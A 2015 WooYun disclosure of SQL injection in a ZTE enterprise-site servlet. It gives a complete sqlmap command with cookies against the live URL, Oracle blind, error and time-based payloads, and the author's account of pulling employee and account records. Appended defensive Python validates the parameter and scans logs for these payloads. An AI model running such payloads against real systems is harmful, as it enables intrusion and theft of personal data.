
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-096228

Title: SQL injection on a ZTE sub-site can leak massive amounts of data

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: 深度安全实验室

Submitted: 2015-02-08 11:46

Fixed: 2015-03-25 11:48

Published: 2015-03-25 11:48

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-08: Details sent to the vendor; awaiting vendor handling
2015-02-11: Vendor confirmed; details disclosed to the vendor only
2015-02-21: Details disclosed to core white hats and domain experts
2015-03-03: Details disclosed to regular white hats
2015-03-13: Details disclosed to intern white hats
2015-03-25: Details disclosed to the public

Brief description:

290,000 employee records and over 10,000 account records

Detailed description:

Proof of vulnerability:

http://enterprise.zte.com.cn/

ZTE's government and enterprise site has a SQL injection that leaks a large amount of data.
The injection point needs a detailed description because the request carries a cookie; once my cookie expires, I'm afraid the vendor would spend ages failing to find where the request was captured:
(1) Register a site account, then go to the channel-partner registration page:

http://enterprise.zte.com.cn/en/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/

[Image: 1.jpg]

(2) You will then see a place to upload a Business License attachment. Upload an image first, then click delete to remove the attachment; the following HTTP request is intercepted:

[Image: 2.jpg]

As shown above, the fileOid parameter is the problem.

sqlmap.py -u "http://enterprise.zte.com.cn/servlet/DeleteApplyUploadServlet?fileOid=26627" --cookie="JSESSIONID=3EABB825D14E82B82915688284B4030A;Hm_lvt_cb044cf8b50b36d639c455f864b7cfa9=1423296717; Hm_lpvt_cb044cf8b50b36d639c455f864b7cfa9=1423298053;_ga=GA1.3.972993370.1423296719; Hm_lvt_98a7f1bca4c6826d3079a7ea36f95f30=1423296821;Hm_lpvt_98a7f1bca4c6826d3079a7ea36f95f30=1423296821; _gat=1" --no-cast --dbs

[Image: 3.jpg]

The ECC_TCM database, 364 tables:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fileOid
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace (original value)
Payload: fileOid=(SELECT (CASE WHEN (5428=5428) THEN 26627 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: error-based
Title: Oracle error-based - Parameter replace
Payload: fileOid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(114)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (3379=3379) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle time-based blind - Parameter replace (heavy queries)
Payload: fileOid=(SELECT (CASE WHEN (5443=5443) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 5443 END) FROM DUAL)
---
web application technology: Servlet 2.4, Nginx, Tomcat 4.2.3.
back-end DBMS: Oracle
Database: ECC_TCM
[364 tables]


The T_USERINFO table holds over 10,000 site account records; pulling a few fields to take a look:

[Image: 9.jpg]

[Image: 6.jpg]

[Image: 8.jpg]

The TCM_EMPLOYEE table holds 290,000 employee records; pulling a few key fields:

[Image: 11.jpg]

[Image: 12.jpg]

[Image: 14.jpg]

That's already a lot of information; I won't look at the other tables~

Fix recommendation:
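The report leaves the fix section empty. As an added illustration (not from the report's author or from ZTE), the Python below applies the allowlist check a numeric fileOid should pass before it reaches SQL, then scans constructed nginx access-log lines for requests to the delete servlet whose fileOid fails that check, tagging each by which of the three Oracle techniques in the sqlmap output it resembles; the log lines, the signature patterns and the function names are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical defender-side check for the numeric fileOid parameter of the
# DeleteApplyUploadServlet endpoint named in the report, plus a log scan that
# flags requests whose fileOid is not a plain integer.
SERVLET_PATH = "/servlet/DeleteApplyUploadServlet"
FILE_OID_RE = re.compile(r"[0-9]{1,18}")   # an integer id; nothing else is accepted
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# Signatures for the three Oracle techniques sqlmap reported (assumed patterns).
SIGNATURES = {
    "boolean-blind": re.compile(r"CASE\s+WHEN", re.I),
    "error-based": re.compile(r"XMLTYPE|CHR\s*\(", re.I),
    "time-based": re.compile(r"ALL_USERS.*ALL_USERS", re.I | re.S),
}

# Constructed sample nginx access-log lines (not from the report): a normal
# delete, three requests shaped like the reported payloads, an unrelated page.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Feb/2015:11:40:01 +0800] "GET /servlet/DeleteApplyUploadServlet?fileOid=26627 HTTP/1.1" 200 12
10.0.0.5 - - [08/Feb/2015:11:40:02 +0800] "GET /servlet/DeleteApplyUploadServlet?fileOid=(SELECT%20(CASE%20WHEN%20(5428%3D5428)%20THEN%2026627%20ELSE%20CAST(1%20AS%20INT)%2F(SELECT%200%20FROM%20DUAL)%20END)%20FROM%20DUAL) HTTP/1.1" 200 12
10.0.0.5 - - [08/Feb/2015:11:40:03 +0800] "GET /servlet/DeleteApplyUploadServlet?fileOid=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)))%20FROM%20DUAL) HTTP/1.1" 500 88
10.0.0.5 - - [08/Feb/2015:11:40:04 +0800] "GET /servlet/DeleteApplyUploadServlet?fileOid=(SELECT%20COUNT(*)%20FROM%20ALL_USERS%20T1,ALL_USERS%20T2) HTTP/1.1" 200 12
10.0.0.7 - - [08/Feb/2015:11:41:00 +0800] "GET /en/partners/Prefecture/ HTTP/1.1" 200 5120
"""

def is_valid_file_oid(raw):
    """Allowlist check the servlet should apply before the value reaches SQL."""
    return FILE_OID_RE.fullmatch(raw) is not None

def classify_payload(value):
    """Tag a rejected fileOid with the injection techniques it resembles."""
    return [n for n, pat in SIGNATURES.items() if pat.search(value)] or ["non-numeric"]

def scan_access_log(text):
    """Return (line_no, decoded_fileOid, tags) for each suspicious delete request."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != SERVLET_PATH:
            continue
        # parse_qs percent-decodes values; keep_blank_values so "fileOid=" is examined
        for value in parse_qs(url.query, keep_blank_values=True).get("fileOid", []):
            if not is_valid_file_oid(value):
                hits.append((line_no, value, classify_payload(value)))
    return hits
```

The same allowlist check, applied in the servlet together with a bound parameter (PreparedStatement) instead of string concatenation, is what closes the injection; the log scan only shows attempts after the fact.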

Copyright notice: when reposting, please credit the source 深度安全实验室@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed at: 2015-02-11 08:45

Vendor reply:

Thanks~

Latest status:

None yet